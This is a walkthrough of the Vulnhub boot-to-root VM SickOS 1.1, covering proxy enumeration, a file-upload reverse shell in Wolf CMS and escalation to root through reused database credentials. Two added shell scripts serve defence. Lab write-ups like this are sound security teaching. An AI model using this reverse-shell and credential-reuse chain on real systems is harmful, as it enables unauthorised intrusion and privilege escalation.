SickOS 1.1

Available from Vulnhub

This is a boot-to-root image from D4rk, released 12/11/15. The description states it is similar in difficulty to machines found in the OSCP lab, so I was pretty excited to try it.

Issues

I couldn’t get the .ovf file to import using VirtualBox, so after some digging I did this:

bash-3.2$ VBoxManage clonemedium --format VDI SickOs1.1-disk1.vmdk SickOs1.1-disk1.vdi
0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100%
Clone medium created in format 'VDI'. UUID: e3e52fbe-8c16-442d-b8e6-c60f783d3bf7

I created a new VM with 1 CPU and 512 MB of RAM, and enabled PAE after VirtualBox complained.

Initial scan and enumeration

[root:~]# nmap -sT -sV -v 10.0.2.10

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-12-14 23:30 EST
NSE: Loaded 33 scripts for scanning.
Initiating ARP Ping Scan at 23:30
Scanning 10.0.2.10 [1 port]
Completed ARP Ping Scan at 23:30, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:30
Completed Parallel DNS resolution of 1 host. at 23:30, 0.00s elapsed
Initiating Connect Scan at 23:30
Scanning 10.0.2.10 [1000 ports]
Discovered open port 22/tcp on 10.0.2.10
Discovered open port 3128/tcp on 10.0.2.10
Completed Connect Scan at 23:30, 4.46s elapsed (1000 total ports)
Initiating Service scan at 23:30
Scanning 2 services on 10.0.2.10
Completed Service scan at 23:30, 11.03s elapsed (2 services on 1 host)
NSE: Script scanning 10.0.2.10.
Initiating NSE at 23:30
Completed NSE at 23:30, 0.22s elapsed
Nmap scan report for 10.0.2.10
Host is up, received arp-response (0.00062s latency).
Not shown: 997 filtered ports, 1 closed port
Reason: 997 no-responses and 1 conn-refused
PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open  http-proxy syn-ack Squid http proxy 3.1.19
MAC Address: 08:00:27:5C:C6:C9 (Cadmus Computer Systems)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.23 seconds
           Raw packets sent: 1 (28B) | Rcvd: 1 (28B)

Trying to connect over ssh didn’t give any helpful banner, so I moved on to the squid proxy. Maybe there’s a web server hiding behind squid…

[root:~]# dirb http://10.0.2.10 /usr/share/wordlists/dirb/common.txt -p 10.0.2.10:3128

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Dec 11 22:41:59 2015
URL_BASE: http://10.0.2.10/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
PROXY: 10.0.2.10:3128

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.0.2.10/ ----
+ http://10.0.2.10/cgi-bin/ (CODE:403|SIZE:285)
+ http://10.0.2.10/connect (CODE:200|SIZE:109)
+ http://10.0.2.10/index (CODE:200|SIZE:21)
+ http://10.0.2.10/index.php (CODE:200|SIZE:21)
+ http://10.0.2.10/robots (CODE:200|SIZE:45)
+ http://10.0.2.10/robots.txt (CODE:200|SIZE:45)
+ http://10.0.2.10/server-status (CODE:403|SIZE:290)

-----------------
END_TIME: Fri Dec 11 22:42:03 2015
DOWNLOADED: 4612 - FOUND: 7

I checked out robots.txt, hoping for a hint:

[root:~]# curl 10.0.2.10/robots.txt -x 10.0.2.10:3128
User-agent: *
Disallow: /
Dissalow: /wolfcms

Exploitation

Looks like a wolfcms installation. Here is a published vulnerability for version 0.8.2. Even though I couldn’t find the installation’s version after viewing the page source, I figured it was worth a try. I needed to log in to the administration panel though, so I set FoxyProxy to use 10.0.2.10:3128 as the proxy and browsed to http://10.0.2.10/wolfcms/?/admin/login:

Login

I tried admin:admin and logged in!

The exploit suggests that any file can be uploaded using the File Manager Function, so after browsing to http://10.0.2.10/wolfcms/?/admin/plugin/file_manager I uploaded pentestmonkey’s php reverse shell:

upload

Next, I set up a listener and visited the php-reverse-shell.

[root:~]# curl -x 10.0.2.10:3128 http://10.0.2.10/wolfcms/public/php-reverse-shell.php
[root:~]# nc -lnvp 443                                                                
listening on [any] 443 ...
connect to [10.0.2.7] from (UNKNOWN) [10.0.2.10] 53514
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 21:23:59 up 17:40,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@SickOs:/$ 
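Added example, not from the original write-up: a defender-side check for the upload step above. It flags the two traces that step leaves on the web host, a request for a server-side script under the upload directory and a script file there that is newer than the CMS install. It assumes an Apache combined-format access log and Wolf CMS's /wolfcms/public/ upload path (the one used with curl above); the log lines are constructed.

```shell
#!/bin/sh
# Added example, not from the original write-up. Detects the traces a
# file-manager upload of a PHP script leaves behind on the web host.
# Assumes Apache combined log format and the /wolfcms/public/ upload path.

# Constructed sample access-log lines (not taken from the VM).
SAMPLE_LOG=$(printf '%s\n' \
  '10.0.2.7 - - [14/Dec/2015:21:22:10 -0500] "GET /wolfcms/?/admin/login HTTP/1.1" 200 2110 "-" "Mozilla/5.0"' \
  '10.0.2.7 - - [14/Dec/2015:21:22:41 -0500] "POST /wolfcms/?/admin/plugin/file_manager/upload HTTP/1.1" 302 0 "-" "Mozilla/5.0"' \
  '10.0.2.7 - - [14/Dec/2015:21:23:59 -0500] "GET /wolfcms/public/php-reverse-shell.php?x=1 HTTP/1.1" 200 0 "-" "curl/7.45.0"' \
  '10.0.2.7 - - [14/Dec/2015:21:24:03 -0500] "GET /wolfcms/public/images/logo.png HTTP/1.1" 200 894 "-" "Mozilla/5.0"')

# Print "client path" for every GET/POST of a PHP-family file under the upload
# directory. Static assets belong there; executable scripts do not. When the
# request came through the box's own Squid proxy the client column holds the
# proxy's address, so correlate with Squid's access.log for the real origin.
script_hits_in_uploads() {
    printf '%s\n' "$1" | awk '
        ($6 == "\"GET" || $6 == "\"POST") {
            path = $7; sub(/\?.*/, "", path)          # drop any query string
            if (path ~ /^\/wolfcms\/public\/.*\.(php|phtml|php[3-7])$/) print $1, path
        }'
}

# List PHP-family files under upload dir $1 modified after reference file $2
# (for example the CMS's own index.php, written at install time).
new_scripts_under() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php[3-7]' \) \
        -newer "$2" 2>/dev/null | sort
}

# Stand-alone run: show what the sample log yields.
script_hits_in_uploads "$SAMPLE_LOG"
```

For mod_php hosts, `php_admin_flag engine off` in a `<Directory>` block for the upload path stops uploaded scripts from executing at all, which removes the need for the second check.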

Escalation

I checked for interesting files in the web directory:

www-data@SickOs:/var/www/wolfcms$ ls -lah
ls -lah
total 52K
drwxr-xr-x 5 root root 4.0K Dec  5 06:33 .
drwxrwxrwx 3 root root 4.0K Dec 13 00:12 ..
-rwxr-xr-x 1 root root  950 Dec  5 06:15 .htaccess
-rwxrwxrwx 1 root root 4.0K Dec  5 06:15 CONTRIBUTING.md
-rwxrwxrwx 1 root root 2.4K Dec  5 06:15 README.md
-rwxrwxrwx 1 root root  403 Dec  5 06:15 composer.json
-rwxrwxrwx 1 root root 3.0K Dec  5 07:26 config.php
drwxrwxrwx 2 root root 4.0K Dec  5 06:15 docs
-rwxrwxrwx 1 root root  894 Dec  5 06:15 favicon.ico
-rwxrwxrwx 1 root root 6.7K Dec  5 06:32 index.php
drwxrwxrwx 4 root root 4.0K Dec 12 21:59 public
-rwxrwxrwx 1 root root    0 Dec  5 06:15 robots.txt
drwxrwxrwx 7 root root 4.0K Dec  5 06:25 wolf

Maybe config.php has some interesting information.

www-data@SickOs:/var/www/wolfcms$ head -n 15 config.php
head -n 15 config.php
<?php 

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);

Root password?

www-data@SickOs:/var/www/wolfcms$ su -
su -
Password: john@123

su: Authentication failure

I guess not. /etc/passwd has an entry for user ‘sickos’:

sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
www-data@SickOs:/var/www/wolfcms$ su sickos
su sickos
Password: john@123

sickos@SickOs:/var/www/wolfcms$ sudo -l
sudo -l
[sudo] password for sickos: john@123

Matching Defaults entries for sickos on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sickos may run the following commands on this host:
    (ALL : ALL) ALL
sickos@SickOs:/var/www/wolfcms$ sudo su -
sudo su -
root@SickOs:~# ls -lah
ls -lah
total 40K
drwx------  3 root root 4.0K Dec 12 22:47 .
drwxr-xr-x 22 root root 4.0K Sep 22 08:13 ..
-rw-r--r--  1 root root   96 Dec  6 07:27 a0216ea4d51874464078c618298b1367.txt
-rw-------  1 root root 3.8K Dec 13 00:12 .bash_history
-rw-r--r--  1 root root 3.1K Apr 19  2012 .bashrc
drwx------  2 root root 4.0K Sep 22 08:33 .cache
-rw-------  1 root root   22 Dec  5 06:24 .mysql_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
-rw-------  1 root root 4.7K Dec 12 22:47 .viminfo
root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying
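Added example, not the author's or Wolf CMS's code: an audit of the weaknesses the directory listing, config.php and the su/sudo steps above expose together, namely web-root entries writable by every local account, a database credentials file readable by every local account, and a password that was then reused for the sickos login. The directory layout and password value in the checks are constructed; the hardening function only changes modes and assumes the caller owns the files.

```shell
#!/bin/sh
# Added example, not the author's or Wolf CMS's code. Audits a web root for
# what the listing and config.php above show: world-writable entries under
# root ownership, and a credentials file any local user can read, which is
# what turns a www-data shell into the sickos login once the password is reused.

# Files and directories under $1 with the world-write bit set (symlinks skipped).
world_writable_under() {
    find "$1" ! -type l -perm -002 2>/dev/null | sort
}

# Wolf CMS config files under $1 that define a non-empty DB_PASS and are
# readable by "other". Only the web server's account should be able to read them.
readable_credential_files() {
    find "$1" -type f -name 'config*.php' -perm -004 2>/dev/null |
        while read -r f; do
            grep -Eq "define\('DB_PASS', *'[^']+'\)" "$f" && printf '%s\n' "$f"
        done | sort
}

# Minimal hardening matching the two checks: drop the world-write bit everywhere
# and make config files owner/group-only. Ownership (root as owner, the web
# server's group, e.g. chown root:www-data) needs root and is left to the admin.
harden_webroot() {
    find "$1" ! -type l -perm -002 -exec chmod o-w {} +
    find "$1" -type f -name 'config*.php' -exec chmod 640 {} +
}
```

The checks only reduce exposure of the stored secret; the reuse of the database password as an OS account password is a policy problem that no file mode fixes.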

Thanks for the fun challenge!